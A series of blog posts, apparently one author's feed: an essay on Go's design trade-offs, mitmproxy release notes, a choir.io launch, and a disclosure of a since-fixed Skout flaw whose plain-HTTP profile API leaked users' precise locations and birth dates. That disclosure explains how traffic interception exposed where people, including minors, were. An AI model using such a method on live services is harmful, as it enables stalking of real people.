can convince you that this isn't as crazy as it sounds.</p>
<h2 id="maps-and-magic">Maps and magic</h2>
<p>Lets pretend that we're the designers of Go, and see if we can follow the
thinking that went into a seemingly simple part of the language - the value
retrieval syntax for maps. We begin with the simplest possible case - direct,
obvious, and familiar from a number of other languages:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>It would be nice if we could keep it this simple, but there's a complication -
what if "foo" doesn't exist in the map? The fact that Go doesn't have
exceptions limits the possibilities. We can discard some gross options out of
hand - for instance, making this a runtime error or returning a magic value
flagging non-existence are both pretty horrible. A more plausible route is to
pass an existence flag back as a second return value:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">mymap</span><span style="color:#c0c5ce;">["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>So far, so logical, and if consistency was the primary goal, we would stop here.
However, having two return arguments would make many common patterns of use
inconvenient. You would constantly be discarding the <strong>ok</strong> flag in situations
where it wasn't needed. Another repercussion is that you couldn't directly use
the results in an <strong>if</strong> clause. Instead of a clean phrasing like this (relying
on the zero value returned by default):</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if map</span><span style="color:#c0c5ce;">["</span><span style="color:#b48ead;">foo</span><span style="color:#c0c5ce;">"] {
</span><span style="color:#65737e;">// Do something
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>... you would have to do this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">if </span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">map</span><span style="color:#c0c5ce;">["</span><span style="color:#b48ead;">foo</span><span style="color:#c0c5ce;">"]; </span><span style="color:#bf616a;">ok </span><span style="color:#c0c5ce;">{
</span><span style="color:#65737e;">// Do something
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>Ugh. What we really want, is to get the best of both worlds. The ease of the
first signature, plus the flexibility of the second. In fact, Go does exactly
that, in a surprising way: it discards some basic conceptual constraints, and
makes the data returned by the map accessor depend on how many variables it's
assigned to. When it's assigned to one variable, it just returns the value.
When it's assigned to two variables, it also returns an existence flag.</p>
<p>Compare this with Python. The dictionary access syntax is identical:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">v = mymap["</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"]
</span></code></pre>
<p>Python does have exceptions, so non-existence is signaled through a
<strong>KeyError</strong>, and the dictionary interface includes a <strong>get</strong> method that
allows the user to specify a default return when this is too cumbersome. This
is certainly consistent on the surface, but there's also a deeper structure
that helps the user understand what's going on. The square bracket accessor
syntax is just syntactic sugar, because the call above is equivalent to this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">v = mymap.</span><span style="color:#96b5b4;">__getitem__</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">")
</span></code></pre>
<p>In a sense, then, the value access is just a method call. The coder can write a
dictionary of their own that acts just like a built-in dictionary<sup class="footnote-reference"><a href="#2">2</a></sup>, and can
also build a clear mental model of what's going on underneath. Python
dictionaries are conceptually built <em>up</em> from more primitive language elements,
where Go maps are designed <em>down</em> from concrete use cases.</p>
<h2 id="range-a-compendium-of-use-cases">Range: a compendium of use cases</h2>
<p>An even stranger beast is the <strong>range</strong> clause of Go's for loops. Like map
accessors, <strong>range</strong> will return either one value or two, depending on the
number of variables assigned to. What's particularly revealing about <strong>range</strong>
is the way these results differ depending on the data type being ranged over.
Consider this piece of code, for example:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">for </span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">y </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">range </span><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">{
}
</span></code></pre>
<p>To figure out what this does, we need to know the type of <strong>v</strong>, and then
consult a table like this:<sup class="footnote-reference"><a href="#1">3</a></sup></p>
<table class="table table-bordered">
<tr>
<th>Range expression</th>
<th>1st Value</th>
<th>2nd Value</th>
</tr>
<tr>
<td>array or slice</td>
<td>index i</td>
<td>a[i]</td>
</tr>
<tr>
<td>map</td>
<td>key k</td>
<td>m[k]</td>
</tr>
<tr>
<td>string</td>
<td>index i of rune</td>
<td>rune int</td>
</tr>
<tr>
<td>channel</td>
<td>element</td>
<td>error</td>
</tr>
</table>
<p>What range does for arrays and maps seems consistent and not particularly
surprising. Things get a tad slightly odd with channels. A second variable
arguably doesn't make much sense when ranging over a channel, so trying to do
this results in a compile time error. Not terribly consistent, but logical.</p>
<p>Weirder still is <strong>range</strong> over strings. When operating on a string, range
returns <a href="http://golang.org/ref/spec#Constants">runes</a> (Unicode code points) not
bytes. So, this code:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= "</span><span style="color:#a3be8c;">a</span><span style="color:#96b5b4;">\u00fc</span><span style="color:#a3be8c;">b</span><span style="color:#c0c5ce;">"
</span><span style="color:#b48ead;">for </span><span style="color:#bf616a;">a</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">b </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">range </span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">a</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">b</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>Prints this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">0 97
1 252
3 98
</span></code></pre>
<p>Notice the jump from 1 to 3 in the array index, because the rune at offset 1 is
two bites wide in UTF-8. And look what happens when we now retrieve the value
at that offset from the array. This:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">])
</span></code></pre>
<p>Prints this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">195
</span></code></pre>
<p>What gives? At first glance, it's reasonable to expect this to print 252, as
returned by <strong>range</strong>. That's wrong, though, because string access by index
operates on bytes, so what we're given is the first byte of the UTF-8 encoding
of the rune. This is bound to cause subtle bugs. Code that works perfectly on
ASCII text simply due to the fact that UTF-8 encodes these in a single byte
will fail mysteriously as soon as non-ASCII characters appear.</p>
<p>My argument here is that <strong>range</strong> is a very clear example of design directly
from concrete use cases down, with little concern for consistency. In fact, the
table of <strong>range</strong> return values above is really just a compendium of use
cases: at each point the result is simply the one that is most directly useful.
So, it makes total sense that ranging over strings returns runes. In fact,
doing anything else would arguably be incorrect. What's characteristic here is
that no attempt was made to reconcile this interface with the core of the
language. It serves the use case well, but feels jarring.</p>
<h2 id="arrays-are-values-maps-are-references">Arrays are values, maps are references</h2>
<p>One final example along these lines. A core irregularity at the heart of Go is
that arrays are values, while maps are references. So, this code will
modify the <strong>s</strong> variable:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">x </span><span style="color:#b48ead;">map</span><span style="color:#c0c5ce;">[</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">] </span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">){
</span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = </span><span style="color:#d08770;">2
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">main</span><span style="color:#c0c5ce;">() {
</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= </span><span style="color:#b48ead;">map</span><span style="color:#c0c5ce;">[</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>And print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">map[0:2]
</span></code></pre>
<p>While this code won't:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">x </span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">){
</span><span style="color:#bf616a;">x</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = </span><span style="color:#d08770;">2
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#8fa1b3;">main</span><span style="color:#c0c5ce;">() {
</span><span style="color:#bf616a;">s </span><span style="color:#c0c5ce;">:= [</span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">]</span><span style="color:#b48ead;">int</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">mod</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Println</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">s</span><span style="color:#c0c5ce;">)
}
</span></code></pre>
<p>And will print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[0]
</span></code></pre>
<p>This is undoubtedly inconsistent, but it turns out not to be an issue in
practice, mostly because slices <em>are</em> references, and are passed around much
more frequently than arrays. This issue has surprised enough people to make it
into the Go FAQ, <a href="http://golang.org/doc/faq#references">where the justification is as
follows</a>:</p>
<blockquote>
<p>There's a lot of history on that topic. Early on, maps and channels were
syntactically pointers and it was impossible to declare or use a non-pointer
instance. Also, we struggled with how arrays should work. Eventually we
decided that the strict separation of pointers and values made the language
harder to use. This change added some regrettable complexity to the language
but had a large effect on usability: Go became a more productive, comfortable
language when it was introduced.</p>
</blockquote>
<p>This is not exactly the clearest explanation for a technical decision I've ever
read, so allow me to paraphrase: "Things evolved this way for pragmatic
reasons, and consistency was never important enough to force a reconciliation".</p>
<h2 id="the-g-word">The G Word</h2>
<p>Now we get to that perpetual bugbear of Go critiques: the lack of generics.
This, I think, is the deepest example of the Go designers' willingness to
sacrifice coherence for pragmatism. One gets the feeling that the Go devs are a
tad weary of this argument by now, but the issue is substantive and worth
facing squarely. The crux of the matter is this: Go's built-in container types
are super special. They can be parameterized with the type of their contained
values in a way that user-written data structures can't be.</p>
<p>The supported way to do generic data structures is to use blank interfaces.
Lets look at an example of how this works in practice. First, here is a simple
use of the built-in array type.</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">l </span><span style="color:#c0c5ce;">:= </span><span style="color:#96b5b4;">make</span><span style="color:#c0c5ce;">([]</span><span style="color:#b48ead;">string</span><span style="color:#c0c5ce;">, </span><span style="color:#d08770;">1</span><span style="color:#c0c5ce;">)
</span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">] = "</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">"
</span><span style="color:#bf616a;">str </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">l</span><span style="color:#c0c5ce;">[</span><span style="color:#d08770;">0</span><span style="color:#c0c5ce;">]
</span></code></pre>
<p>In the first line we initialize the array with the type <strong>string</strong>. We then
insert a value, and in the final line, we retrieve it. At this point, <strong>str</strong>
has type <strong>string</strong> and is ready to use. The user-written analogue of this
might be a modest data structure with <strong>put</strong> and <strong>get</strong> methods. We can
define this using interfaces like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">type </span><span style="color:#c0c5ce;">gtype </span><span style="color:#b48ead;">struct </span><span style="color:#c0c5ce;">{
</span><span style="color:#bf616a;">data </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{}
}
</span><span style="color:#b48ead;">func </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">t </span><span style="color:#c0c5ce;">*</span><span style="color:#b48ead;">gtype</span><span style="color:#c0c5ce;">) </span><span style="color:#8fa1b3;">put</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">v </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{}) {
</span><span style="color:#bf616a;">t</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">data </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">v
</span><span style="color:#c0c5ce;">}
</span><span style="color:#b48ead;">func </span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">t </span><span style="color:#c0c5ce;">*</span><span style="color:#b48ead;">gtype</span><span style="color:#c0c5ce;">) </span><span style="color:#8fa1b3;">get</span><span style="color:#c0c5ce;">() </span><span style="color:#b48ead;">interface</span><span style="color:#c0c5ce;">{} {
</span><span style="color:#b48ead;">return </span><span style="color:#bf616a;">t</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">data
</span><span style="color:#c0c5ce;">}
</span></code></pre>
<p>To use this structure, we would say:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">v </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">gtype</span><span style="color:#c0c5ce;">{}
</span><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">put</span><span style="color:#c0c5ce;">("</span><span style="color:#a3be8c;">foo</span><span style="color:#c0c5ce;">")
</span><span style="color:#bf616a;">str </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">v</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">get</span><span style="color:#c0c5ce;">().(</span><span style="color:#b48ead;">string</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>We can assign a string to a variable with the empty interface type without
doing anything special, so <strong>put</strong> is simple. However, we need to use a type
assertion on the way out, otherwise the <strong>str</strong> variable will have type
<strong>interface{}</strong>, which is probably not what we want.</p>
<p>There are a number of issues here. It's cosmetically bothersome that we have to
place the burden of type assertion on the caller of our data structure, making
the interface just a little bit less nice to use. But the problems extend
beyond syntactic inconvenience - there's a substantive difference between these
two ways of doing things. Trying to insert a value of the wrong type into the
built-in array causes a compile-time error, but the type assertion acts at
run-time and causes a panic on failure. The blank-interface paradigm sidesteps
Go's compile time type checking, negating any benefit we may have received from
it.</p>
<p>The biggest issue for me, though, is the conceptual inconsistency. This is
something that's difficult to put into words, so here's a picture:</p>
<div class="media">
<a href="inconsistency.jpg">
<img src="inconsistency.jpg" />
</a>
</div>
<p>The fact that the built-in containers magically do useful things that
user-written code can't irks me. It hasn't become less jarring over time, and
still feels like a bit of grit in my eye that I can't get rid of. I might be an
extreme case, but this is an aesthetic instinct that I think is shared by many
programmers, and would have convinced many language designers to approach the
problem differently.</p>
<p>The extent to which Go's lack of generics is a critical problem, however, is
not the point here. The meat of the matter is <strong>why</strong> this design decision was
taken, and what it reveals about the character of Go. Here's how the lack of
generics is <a href="http://blog.golang.org/go-at-io-frequently-asked-questions">justified by the Go
developers</a>:</p>
<blockquote>
<p>Many proposals for generics-like features have been mooted both publicly and
internally, but as yet we haven't found a proposal that is consistent with
the rest of the language. We think that one of Go's key strengths is its
simplicity, so we are wary of introducing new features that might make the
language more difficult to understand.</p>
</blockquote>
<p>Instead of creating the atomic elements needed to support generic data
structures then adding a suite of them to the standard library, the Go team
went the other way. There was a concrete use case for good data structures, and
so they were added. Attempting a deep reconciliation with the rest of the
language was a secondary requirement that was so unimportant that it fell by
the wayside for Go 1.x.</p>
<h1 id="a-pragmatic-beauty">A Pragmatic Beauty</h1>
<p>Lets over-simplify for a moment and divide languages into two extreme camps. On
the one hand, you have languages that are highly consistent, with most higher
order functionality deriving from the atomic elements of the language. In this
camp, we can find languages like Lisp. On the other hand are languages that are
shamelessly eager to please. They tend to grow organically, sprouting syntax as
needed to solve specific pragmatic problems. As a consequence, they tend to be
large, syntactically diverse, not terribly coherent, and, occasionally,
sometimes even <a href="http://www.perlmonks.org/?node_id=663393">unparseable</a>. In this
camp, we find languages like Perl. It's tempting to think that there exists a
language somewhere in the infinite multiverse of possibilities that unites
perfect consistency and perfect usability, but if there is, we haven't found
it. The reality is that all languages are a compromise, and that balancing
these two forces against each other is really what makes language design so
hard. Placing too much value on consistency constrains the human concessions we
can make for mundane use cases. Making too many concessions results in a
language that lacks coherence.</p>
<p>Like many programmers, I instinctively prefer purity and consistency and
distrust "magic". In fact, I've never found a language with a strongly
pragmatic bent that I really liked. Until now, that is. Because there's one
thing I'm pretty clear on: Go is on the Perl end of this language design
spectrum. It's designed firmly from concrete use cases down, and shows its
willingness to sacrifice consistency for practicality again and again. The
effects of this design philosophy permeate the language. This, then, is the
source of my initial dissatisfaction with Go: I'm pre-disposed to dislike many
of its core design decisions.</p>
<p>Why, then, has the language grown on me over time? Well, I've gradually become
convinced that practically-motivated flaws like the ones I list in this post
add up to create Go's unexpected nimbleness. There's a weird sort of alchemy
going on here, because I think any one of these decisions in isolation makes Go
a worse language (even if only slightly). Together, however, they jolt Go out
of a local maximum many procedural languages are stuck in, and take it
somewhere better. Look again at each of the cases above, and imagine what the
cumulative effect on Go would have been if the consistent choice had been made
each time. The language would have more syntax, more core concepts to deal
with, and be more verbose to write. Once you reason through the repercussions,
you find that the result would have been a worse language overall. It's clear
that Go is not the way it is because its designers didn't know better, or
didn't care. Go is the result of a conscious pragmatism that is deep and
audacious. Starting with this philosophy, but still managing to keep the
language small and taut, with almost nothing dispensable or extraneous took
great discipline and insight, and is a remarkable achievement.</p>
<p>So, despite its flaws, Go remains graceful. It just took me a while to
appreciate it, because I expected the grace of a ballet dancer, but found the
grace of an battered but experienced bar-room brawler.</p>
<p>--</p>
<p>Edited to remove some inaccuracies about channels.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">3</sup>
<p>Simplified from <a href="https://code.google.com/p/go-wiki/wiki/Range">here</a>.</p>
</div>
<div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup>
<p>I don't mean mundane details like the syntax and core concepts of a
language. In the case of Go, you can get a handle on these in an hour by
reading the language specification.</p>
</div>
<div class="footnote-definition" id="3"><sup class="footnote-definition-label">1</sup>
<p>Pedant hedge: yes, the illusion isn't perfect, and there are in fact
subtle ways in which Python dictionaries are not just objects like any other.</p>
</div>
mitmproxy and pathod 0.9.2
2013-08-25T00:00:00+00:00
2013-08-25T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9_2/
<div class="media">
<a href="../announce0_9_1/mitmproxy_0_9_1.png">
<img src="../announce0_9_1/mitmproxy_0_9_1.png" />
</a>
</div>
<p>I've just released v0.9.2 of both <a href="http://mitmproxy.org">mitmproxy</a> and
<a href="http://pathod.org">pathod</a>. This is a bugfix release, chiefly to address two
crashing issues affecting mitmproxy when relaying SSL traffic. A range of other
fixes and improvements are also included - if you use mitmproxy, you should
upgrade.</p>
<h2 id="changelog">CHANGELOG</h2>
<ul>
<li>Improvements to the mitmproxywrapper.py helper script for OSX.</li>
<li>Don't take minor version into account when checking for serialized file
compatibility.</li>
<li>Fix a bug causing resource exhaustion under some circumstances for SSL
connections.</li>
<li>Revamp the way we store interception certificates. We used to store these
on disk, they're now in-memory. This fixes a race condition related to
cert handling, and improves compatibility with Windows, where the rules
governing permitted file names are weird, resulting in errors for some
valid IDNA-encoded names.</li>
<li>Display transfer rates for responses in the flow list.</li>
<li>Many other small bugfixes and improvements.</li>
</ul>
Introducing choir.io
2013-08-16T00:00:00+00:00
2013-08-16T00:00:00+00:00
https://corte.si/posts/choir/intro/
<div class="media">
<a href="choir.png">
<img src="choir.png" />
</a>
<div class="subtitle">
choir.io
</div>
</div>
<p>Today, I'm raising the veil (slightly) on a new project -
<a href="https://choir.io">choir.io</a>. The most succinct description of choir.io is that
it is a service that turns events into sound. Why would you want to do that?
Well, I believe that there are compelling reasons to make sound part of your
monitoring stack. Let's see if I can convince you.</p>
<h2 id="the-soundscape">The soundscape</h2>
<p>When I walk into my study every morning, I'm surrounded a rich, subtle
soundscape that exists just beneath conscious perception. My air-conditioner,
computers and monitors all emit hums and purrs. I can "tune in" to these if I
focus, but they usually only draw my attention when something changes. When the
power goes out there is a deathly silence, when a CPU fan noise changes pitch
or texture, it bothers me immediately.</p>
<p>Layered over this background are more obtrusive sounds, closer to the threshold
of awareness - the clacking of keyboards, faint noises of my family getting
ready for their day upstairs, the front door opening and closing. Whether or
not I pay attention to these is somewhat context dependent. Am I waiting, or
instance, for my wife and kids to start trooping down the stairs so I can join
them for my son's swimming lesson? If I am, I listen out for those sounds
specifically. I get an enormous amount of information about my world from these
more discrete, event-related noises.</p>
<p>Finally, there are the really obtrusive sounds, things that immediately get my
attention. This might be someone saying my name, my phone ringing, a knock at
the door, or a smoke alarm. I'm very aware of these, and they usually signal
something I have to deal with immediately.</p>
<p>These layers of more and less obtrusive sounds form a soundscape that is
ever-present, and utterly necessary in our day-to-day lives. Notice how
effortless this process of extracting meaning from our ambient sounds is. Our
minds process this information stream without any mental exertion, filters out
what we don't need to notice, and draws our attention to what we do. There's a
lot of cognitive research (that I might delve into in future posts) that show
that our brains and auditory systems are specifically designed to make sense of
the world in this way.</p>
<p>We have nothing like this rich texture of ambient awareness for the technology
that surrounds us. Our monitoring mechanisms seem to be stuck at the ends of
the intrusiveness spectrum. At one end, we have email notifications that demand
our attention until we start to ignore them or silence them with a filter. At
the other end we have passive status dashboards that require us to remember to
switch context and visually consult a different interface. Choir.io doesn't aim
to supplant either of these, but tries to fill in the blank portion of the
awareness spectrum between them.</p>
<p>When I sit at my desk, I can hear our server architecture humming away. There's
the subtle pitter-patter of hits to various webservers, the occasional clack of
an SSH login. Occasionally there is a chime when @alexdong pushes to Github,
followed shortly by the celebratory cheer of a server deploy. When I hear the
jarring note of a 500 server error, I switch context to view logs or a
dashboard, but otherwise my focus stays with my editor window. Choir is young,
but it's already become an indispensable part of my life.</p>
<h2 id="challenges-and-next-steps">Challenges and next steps</h2>
<p>There are a number of key questions that we'd like to answer with the help of
our intrepid early adopters. First among these is the question of soundscape
design. What makes a good sound pack? What is the right mix of intrusive and
non-intrusive sounds? How do we construct soundscapes that blend into the
background like natural sounds do? Another set of questions surrounds the API
and integration. What is the right blend of simplicity and power is in the API?
Which services should we integrate with next?</p>
<p>There are some obvious next steps in the works. We recognize that sound pack
design is a deep problem with subjective solutions. So, letting users assemble,
edit and eventually share their own sound packs is high on our list of
priorities. Free-standing Choir.io player apps for Windows and OSX will also be
on the way soon, so you won't need to remember to keep a browser tab open.
Technical improvements to the API that are on the way include UDP and SSL
support.</p>
<p>Choir is trying to do something new, and we want as much feedback as early in
the process as possible. So, we've decided to start sending out invites today,
even though Choir is far from the polished system that it will be in a few
months. If you're brave, willing to give frank feedback, and want to help us
explore this exciting idea, please <a href="https://choir.io">request an invite</a>.</p>
mitmproxy 0.9.1
2013-06-16T00:00:00+00:00
2013-06-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce0_9_1/
<div class="media">
<a href="mitmproxy_0_9_1.png">
<img src="mitmproxy_0_9_1.png" />
</a>
</div>
<p>I'm happy to announce the release of <a href="http://mitmproxy.org">mitmproxy 0.9.1</a>.
This is a bugfix release, with no significant changes in behaviour.</p>
<p>As hinted in my previous release note, the project itself is also evolving. As
of this release, mitmproxy and its sister projects (<a href="http://pathod.net">pathod</a>
and <a href="https://github.com/mitmproxy/netlib">netlib</a>) are housed under a separate
organization on Github, rather than my own personal space:</p>
<p><a class="btn" href="https://github.com/mitmproxy">github.com/mitmproxy</a></p>
<p>I'm also very happy to welcome the first external core developer to the
mitmproxy projext: <a href="http://maximilianhils.com/">Maximilian Hils</a>. Max is the
author of <a href="http://honeyproxy.org/">HoneyProxy</a>, a web analysis front-end for
mitmproxy. In the next few months, he'll be working on integrating and
expanding his work to become mitmproxy's official web interface. Max's efforts
will be sponsored by Google under their <a href="http://www.google-melange.com/gsoc/homepage/google/gsoc2013">Summer of
Code</a> program, and
will be mentored by the <a href="http://www.honeynet.org/">HoneyNet Project</a>.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Use "correct" case for Content-Type headers added by mitmproxy.</li>
<li>Make UTF environment detection more robust.</li>
<li>Improved MIME-type detection for viewers.</li>
<li>Always read files in binary mode (Windows compatibility fix).</li>
<li>Correct PyOpenSSL dependency declaration.</li>
<li>Some developer documentation.</li>
</ul>
Skout: a devastating privacy vulnerability
2013-05-31T00:00:00+00:00
2013-05-31T00:00:00+00:00
https://corte.si/posts/security/skout/
<p>I've become a bit weary of the process of public vulnerability disclosure - I'm
much more likely nowadays to just drop companies an anonymous notice and move
on. Every so often, though, I come across an issue so egregious that talking
about it publicly seems like an imperative. This is one of them.</p>
<p>First, some background. Skout is a location-based mobile social network. The
idea is to allow people to meet others in their area, semi-anonymously, get to
know them, and then perhaps line up a meeting in meatspace. As far as I can
tell, a huge fraction of the userbase are singles, using Skout as an ad-hoc
dating app. Skout's scale is significant - they don't release exact user
numbers, but I've seen claims of more than 10 million users, and a growth rate
of a million users per month.</p>
<p>In 2012, Skout went through a major PR catastrophe, when its service was linked
to <a href="http://bits.blogs.nytimes.com/2012/06/12/after-rapes-involving-children-skout-a-flirting-app-faces-crisis/">no fewer than 3 separate rapes of
children</a>
by adult men posing as teenagers. Skout immediately suspended the service for
teenagers and went through a security re-vamp. A month later, <a href="http://blog.skout.com/2012/07/13/teens-welcome-back-to-skout/">teens were
allowed back</a>,
with Skout making much of its new safety system, "advanced, proprietary
algorithms" to weed out stalkers, and its long-term commitment to community
safety.</p>
<p>Given this background, the problem I found is simple but devastating. The Skout
mobile application talks to Skout's servers through a simple API. When a user's
profile is viewed an unencrypted, plain-HTTP request is made to to a path like
this:</p>
<pre style="background-color:#2b303b;">
<code>http://i22.skout.com/services/ServerService/getProfile
</code></pre>
<p>What's returned is a blob of XML containing the user's complete profile data.
In fact, the profile data is <em>too</em> complete, including some bits of data
information that is never actually used by the app. For example, we can see the
user's exact date of birth:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">ax213:birthdayDate</span><span style="color:#c0c5ce;">>xx/xx/1995</</span><span style="color:#bf616a;">ax213:birthdayDate</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>... but only the user's age in years is actually displayed. Most serious,
however, is the high-precision location information that is returned in the
ax213:homeLocation and ax213:location tags:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"><</span><span style="color:#bf616a;">ax213:latitude</span><span style="color:#c0c5ce;">>-xx.xxx</</span><span style="color:#bf616a;">ax213:latitude</span><span style="color:#c0c5ce;">>
<</span><span style="color:#bf616a;">ax213:longitude</span><span style="color:#c0c5ce;">>xxx.xxx</</span><span style="color:#bf616a;">ax213:longitude</span><span style="color:#c0c5ce;">>
</span></code></pre>
<p>The three decimal places of precision in the co-ordinates is enough to locate a
user to within about 110 meters north-south, and substantially less than that
east-west depending on the distance from the equator. Here's what that looks
like in a hypothetical example:</p>
<div class="media">
<a href="skout-map.png">
<img src="skout-map.png" />
</a>
</div>
<p>I used <a href="http://mitmproxy.org">mitmproxy</a> to observe Skout's traffic, but
because the request is unencrypted any tool that allows you to inspect network
traffic would be enough. The result is a stalker's wet dream - click on an
anonymous profile, watch your network traffic, and find out exactly where the
victim lives. I've also seen minors located at malls where they hang out, and
at their schools... Given the scale of Skout's userbase and the ease with which
the data can be obtained, I think there's a high likelihood that this issue has
already been used for unsavoury purposes.</p>
<p>I reported the vulnerability to Skout on the 24th of May. I'm happy to report
that they immediately realised the seriousness of the situation, and their API
stopped returning exact lat/long values a few hours later. Subsequent
correspondence with Niklas Lindstrom, Skout's CTO, confirmed that they were
taking steps to tighten security. I've encouraged Skout to speak about this
publicly - their userbase needs to know about the issue, and need to be
reassured that action is being taken to ensure that this type of privacy breach
won't ever recur.</p>
How mitmproxy works
2013-05-16T00:00:00+00:00
2013-05-16T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/howitworks/
<p>I started work on <a href="http://mitmproxy.org">mitmproxy</a> because I was frustrated
with the available interception tools. I had a long list of minor complaints -
they were insufficiently flexible, not programmable enough, mostly written in
Java (a language I don't enjoy), and so forth. My most serious problem, though,
was opacity. The best tools were all closed source and commercial. SSL
interception is a complicated and delicate process, and after a certain point,
not understanding precisely what your proxy is doing just doesn't fly.</p>
<p>The text below is now part of the <a href="http://mitmproxy.org/doc/index.html">official
documentation</a> of mitmproxy. It's a
detailed description of mitmproxy's interception process, and is more or less
the overview document I wish I had when I first started the project. I proceed
by example, starting with the simplest unencrypted explicit proxying, and
